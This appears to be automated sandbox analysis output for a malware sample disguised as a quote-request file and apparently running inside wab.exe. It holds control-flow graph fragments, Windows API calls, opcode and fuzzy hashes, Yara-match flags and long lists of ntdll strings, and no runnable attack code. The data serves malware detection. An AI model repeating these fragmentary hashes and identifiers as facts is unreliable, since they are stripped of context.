                                                            • Instruction ID: 0086e2cb941a228be3f0a480d6c6eb9ca158d2519a763bca3b64240ebf0dc8d8
                                                            • Opcode Fuzzy Hash: 6edfde867d52d02861dc65ed0ba90770042b8757d2a25ffa77bfc93e67bb64d6
                                                            • Instruction Fuzzy Hash: 7E71E53190CBC98FDB56EF3888655A5BBF1EF66310B4505EED08AC7293DB28B805C791
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1466563673.00007FF7C0230000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7C0230000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_7ff7c0230000_z27PEDIDOSDECOTIZACI__N___s__x__l__x___.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: gfff
                                                            • API String ID: 0-1553575800
                                                            • Opcode ID: bafde092fbaec542ecb68d9d86044544d7d1d18a3988fea596a877581825cdf4
                                                            • Instruction ID: 00fc563bba5e58c0133fb5b59f72e4e1cb8133da67723cf5a547e167ce990c62
                                                            • Opcode Fuzzy Hash: bafde092fbaec542ecb68d9d86044544d7d1d18a3988fea596a877581825cdf4
                                                            • Instruction Fuzzy Hash: E751293264D7850FD30E9A7D5C5A4A17FE5EB8722070982FFD4C6CB2A7E518A80787D2

                                                            Execution Graph

                                                            Execution Coverage:1.4%
                                                            Dynamic/Decrypted Code Coverage:5%
                                                            Signature Coverage:7.8%
                                                            Total number of Nodes:141
                                                            Total number of Limit Nodes:10

                                                            Control-flow Graph

                                                            control_flow_graph 90 417553-41756f 91 417577-41757c 90->91 92 417572 call 42dd13 90->92 93 417582-417590 call 42e233 91->93 94 41757e-417581 91->94 92->91 97 4175a0-4175b1 call 42c6e3 93->97 98 417592-41759d call 42e4d3 93->98 103 4175b3-4175c7 LdrLoadDll 97->103 104 4175ca-4175cd 97->104 98->97 103->104
                                                            APIs
                                                            • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 004175C5
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Load
                                                            • String ID:
                                                            • API String ID: 2234796835-0
                                                            • Opcode ID: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction ID: fafacfff03c406d328f9ed7d4dbcfc528020c249033774d8f048681923be9f41
                                                            • Opcode Fuzzy Hash: cc12b25d517994b9bcc517731b469122a00c5f8ed43c7c54d5fb46cc540c6b3e
                                                            • Instruction Fuzzy Hash: 53011EB5E4020DBBDF10DAE5DC42FDEB7B89B54308F0041AAE90897240F635EB548B95

                                                            Control-flow Graph

                                                            control_flow_graph 115 42b143-42b17c call 404783 call 42c1e3 NtClose
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction ID: 2aff59b114aa5f3b7d838e1b644e2537cdd7cbaedcee0386b42f69f80789310e
                                                            • Opcode Fuzzy Hash: a095f2cc110330fb65e3db0d0815f16563e75411f895d3cd10f7a49718a19118
                                                            • Instruction Fuzzy Hash: FDE046362002147BC620EA5AEC82F9F776CDBC6764F40401AFA1CA7242CAB5BA11C7E5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4913b913b703494538454b7d82031e4bff1fee7c6ca3158c0b89cd62e8dd9af2
                                                            • Instruction ID: 124da4ec5904d6468942789d86da37c76bbf3314d2e03caa83eb54ec6a7ece3f
                                                            • Opcode Fuzzy Hash: 4913b913b703494538454b7d82031e4bff1fee7c6ca3158c0b89cd62e8dd9af2
                                                            • Instruction Fuzzy Hash: 5190023160550802D100B5584519706100587D0201FA5C521A0424668E87D58E5165A2

                                                            Control-flow Graph

                                                            control_flow_graph 129 3662b60-3662b6c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 053c19bdae925f6313b103893c57fe0d1263ab1e7aadbd4834db88613a267944
                                                            • Instruction ID: 6c6176b314bb4990f0b9c500050f9ff595f7c8eedccf3436c1538ebd183ecc93
                                                            • Opcode Fuzzy Hash: 053c19bdae925f6313b103893c57fe0d1263ab1e7aadbd4834db88613a267944
                                                            • Instruction Fuzzy Hash: D0900261202404034105B5584419616400A87E0201B95C131E1014690EC6658D916125
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a1721688691662e658dddb6d66d00e3f61b01bdce46a0c0797d5a8dbeecf83fb
                                                            • Instruction ID: 1ea41a71d086cbdab584eeff2fdb35fb41c25bd54b084ccafd086da9f9754c40
                                                            • Opcode Fuzzy Hash: a1721688691662e658dddb6d66d00e3f61b01bdce46a0c0797d5a8dbeecf83fb
                                                            • Instruction Fuzzy Hash: D590023120140813D111B5584509707000987D0241FD5C522A0424658E97968E52A121

                                                            Control-flow Graph

                                                            control_flow_graph 130 3662c70-3662c7c LdrInitializeThunk
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: dad630349b18bd1286e6aeca9782aa684b1e157529a3c5057c13d00fb5356b1f
                                                            • Instruction ID: 3cd50f2e8ccf7c6626df137516ffeb23f41b2c16615efc560867c857a2ad2eb4
                                                            • Opcode Fuzzy Hash: dad630349b18bd1286e6aeca9782aa684b1e157529a3c5057c13d00fb5356b1f
                                                            • Instruction Fuzzy Hash: 5B90023120148C02D110B558840974A000587D0301F99C521A4424758E87D58D917121

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 35083e93d7c499af6bf69726bce9b149e3f43427cf7b6ce97d13e8229f192a37
                                                            • Instruction ID: c255f3bd0e9e34b81c1a2fd59107513f68e7910af3c4f273d569b7e3037494ac
                                                            • Opcode Fuzzy Hash: 35083e93d7c499af6bf69726bce9b149e3f43427cf7b6ce97d13e8229f192a37
                                                            • Instruction Fuzzy Hash: 54113D71E0414C7AEB00AAA4EC82DEF7B7CDF41754F04416AF90477241E66D4E4687E5

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: da020c4ce43737df3c69372c4e09e9ddbc07101470960ff1b8c997d96d48b991
                                                            • Instruction ID: 34b13886dadd7fd07c39e188c78d343a6f93096d9b97f5e34d7094c2d9b74a5f
                                                            • Opcode Fuzzy Hash: da020c4ce43737df3c69372c4e09e9ddbc07101470960ff1b8c997d96d48b991
                                                            • Instruction Fuzzy Hash: 69016F72E4815C7ADB019AA9DC42DEFBB7CDF41355F00806AF908BB201D57D5F0647A5

                                                            Control-flow Graph

                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 02182858866b11fc36b05afde3c0cca24a80386001e4e64e3890204a7fa96743
                                                            • Instruction ID: 85ea797713ef2f1ffd4fa2af1e4491b1b69f7d82606ba95b39f9d8861668c0c0
                                                            • Opcode Fuzzy Hash: 02182858866b11fc36b05afde3c0cca24a80386001e4e64e3890204a7fa96743
                                                            • Instruction Fuzzy Hash: 5B01C8B1E0425C7ADB00AAE59C81DEF7B7CDF40758F048069FA0477241D67C5F0647A5

                                                            Control-flow Graph

                                                            control_flow_graph 54 413b33-413b39 55 413b3b-413b40 54->55 56 413b8e-413bcd call 417553 call 4046f3 call 4243c3 54->56 55->56 63 413bed-413bf3 56->63 64 413bcf-413bde PostThreadMessageW 56->64 64->63 66 413be0-413bea 64->66 66->63
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: eee4938e4584ce92ac3c146049e7859fa5ea1016ba350731dcc4b08fc669d0e3
                                                            • Instruction ID: 9ed5e8185a674c2899785c177f71d45a7574e53354966d2f457e22f45eb20564
                                                            • Opcode Fuzzy Hash: eee4938e4584ce92ac3c146049e7859fa5ea1016ba350731dcc4b08fc669d0e3
                                                            • Instruction Fuzzy Hash: 5CF07DB6A0011C76DB005594AC81CFF676CCE80359F00C17AF904B7201E57D4F0147A5

                                                            Control-flow Graph

                                                            control_flow_graph 67 413bf5-413bfb 68 413bd3-413bde PostThreadMessageW 67->68 69 413bfd 67->69 70 413be0-413bea 68->70 71 413bed-413bf3 68->71 70->71
                                                            APIs
                                                            • PostThreadMessageW.USER32(1150d71,00000111,00000000,00000000), ref: 00413BDA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: 1150d71$1150d71
                                                            • API String ID: 1836367815-1654785705
                                                            • Opcode ID: 33b9f56ef2263621a7ba271a972f579ab5ab6b3c3bee8db59496c64086e55f44
                                                            • Instruction ID: 8fe9385beedc6bbe6ef69c6083bae87f9348a7abf43a9996c95160a63fea186f
                                                            • Opcode Fuzzy Hash: 33b9f56ef2263621a7ba271a972f579ab5ab6b3c3bee8db59496c64086e55f44
                                                            • Instruction Fuzzy Hash: E5D02E3270A11D709221609C3C80CFBA38CC685AB3F000237FB08D0080FA096A4622B1

                                                            Control-flow Graph

                                                            control_flow_graph 105 42b443-42b484 call 404783 call 42c1e3 RtlAllocateHeap
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(?,0041DD7B,?,?,00000000,?,0041DD7B,?,?,?), ref: 0042B47F
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction ID: 3b5637f1d6a06553b0b5898cd5f4639ff1ffb45395e0277c21d2b4a116d8cd3c
                                                            • Opcode Fuzzy Hash: 466c08e0599dceb2b1ac87d31f08fd08cfc95ce86fcefad45fa711f2d663cd9b
                                                            • Instruction Fuzzy Hash: 3CE06D722002047BD610EE9ADC81EAB33ACEFC9710F404419FA0CA7242D670B9108AB9

                                                            Control-flow Graph

                                                            control_flow_graph 110 42b493-42b4d7 call 404783 call 42c1e3 RtlFreeHeap
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,00416E20,000000F4,?,?,?,?,?), ref: 0042B4D2
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID:
                                                            • API String ID: 3298025750-0
                                                            • Opcode ID: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction ID: 754ef0c31334b43114887b10ffae1144e8c009d02f4b77bdfd954f2ecf6ede40
                                                            • Opcode Fuzzy Hash: ff1f9aa8da99a8e5e4f90dc6e257a5551f3bffd3857a71a35f413fcecc4b40f6
                                                            • Instruction Fuzzy Hash: B9E039B2204214BBC610EA59DC41F9B33ACDBC9720F40401ABD08A7241CA70B911CAB9

                                                            Control-flow Graph

                                                            control_flow_graph 120 42b4e3-42b51f call 404783 call 42c1e3 ExitProcess
                                                            APIs
                                                            • ExitProcess.KERNEL32(?,00000000,?,?,1F7C2165,?,?,1F7C2165), ref: 0042B51A
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1542801016.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ExitProcess
                                                            • String ID:
                                                            • API String ID: 621844428-0
                                                            • Opcode ID: d58103bc4f0944f419cde8c5d5e48aebb6a47aa2aba750f74cbfd609f9e9a146
                                                            • Instruction ID: e72e3ac899290caa13d09855136e694114c0080e93ee067bad854edb48cd4189
                                                            • Opcode Fuzzy Hash: d58103bc4f0944f419cde8c5d5e48aebb6a47aa2aba750f74cbfd609f9e9a146
                                                            • Instruction Fuzzy Hash: 80E04F762102147BD210BA5ADC41FAB775CDFC5754F40441AFA09A7141D6B17A10C6F5

                                                            Control-flow Graph

                                                            control_flow_graph 125 3662c0a-3662c0f 126 3662c11-3662c18 125->126 127 3662c1f-3662c26 LdrInitializeThunk 125->127
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 978dc29c27a421ef65cc22e0aab14bf72594c989236d656efd518c9578f08b0c
                                                            • Instruction ID: bc81879311eb56542906667b969a49db7eb9f379020a9a890465bf9891db0fd4
                                                            • Opcode Fuzzy Hash: 978dc29c27a421ef65cc22e0aab14bf72594c989236d656efd518c9578f08b0c
                                                            • Instruction Fuzzy Hash: CAB092729029C9CAEB51EB604B0DB1B7A04ABD1741F6AC5B2E2030792F4779C5D1E2B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036954CE
                                                            • Critical section address., xrefs: 03695502
                                                            • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036954E2
                                                            • undeleted critical section in freed memory, xrefs: 0369542B
                                                            • Invalid debug info address of this critical section, xrefs: 036954B6
                                                            • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0369540A, 03695496, 03695519
                                                            • double initialized or corrupted critical section, xrefs: 03695508
                                                            • Thread identifier, xrefs: 0369553A
                                                            • Critical section address, xrefs: 03695425, 036954BC, 03695534
                                                            • corrupted critical section, xrefs: 036954C2
                                                            • 8, xrefs: 036952E3
                                                            • Address of the debug info found in the active list., xrefs: 036954AE, 036954FA
                                                            • Thread is in a state in which it cannot own a critical section, xrefs: 03695543
                                                            • Critical section debug info address, xrefs: 0369541F, 0369552E
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                            Strings
                                                            • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0361D0CF
                                                            • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0361D2C3
                                                            • @, xrefs: 0361D313
                                                            • Control Panel\Desktop\LanguageConfiguration, xrefs: 0361D196
                                                            • @, xrefs: 0361D2AF
                                                            • @, xrefs: 0361D0FD
                                                            • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0361D262
                                                            • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0361D146
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            • SXS: %s() passed the empty activation context, xrefs: 03692165
                                                            • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0369219F
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 03692178
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 036921BF
                                                            • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 03692180
                                                            • RtlGetAssemblyStorageRoot, xrefs: 03692160, 0369219A, 036921BA
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                            Strings
                                                            • WindowsExcludedProcs, xrefs: 0364522A
                                                            • Kernel-MUI-Language-SKU, xrefs: 0364542B
                                                            • Kernel-MUI-Language-Allowed, xrefs: 0364527B
                                                            • Kernel-MUI-Number-Allowed, xrefs: 03645247
                                                            • Kernel-MUI-Language-Disallowed, xrefs: 03645352
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.1543418922.00000000035F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035F0000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_35f0000_wab.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                            Strings
                                                            • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 036921D9, 036922B1
                                                            • .Local, xrefs: 036528D8
                                                            • SXS: %s() passed the empty activation context, xrefs: 036921DE
                                                            • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 036922B6
                                                            Memory Dump Source
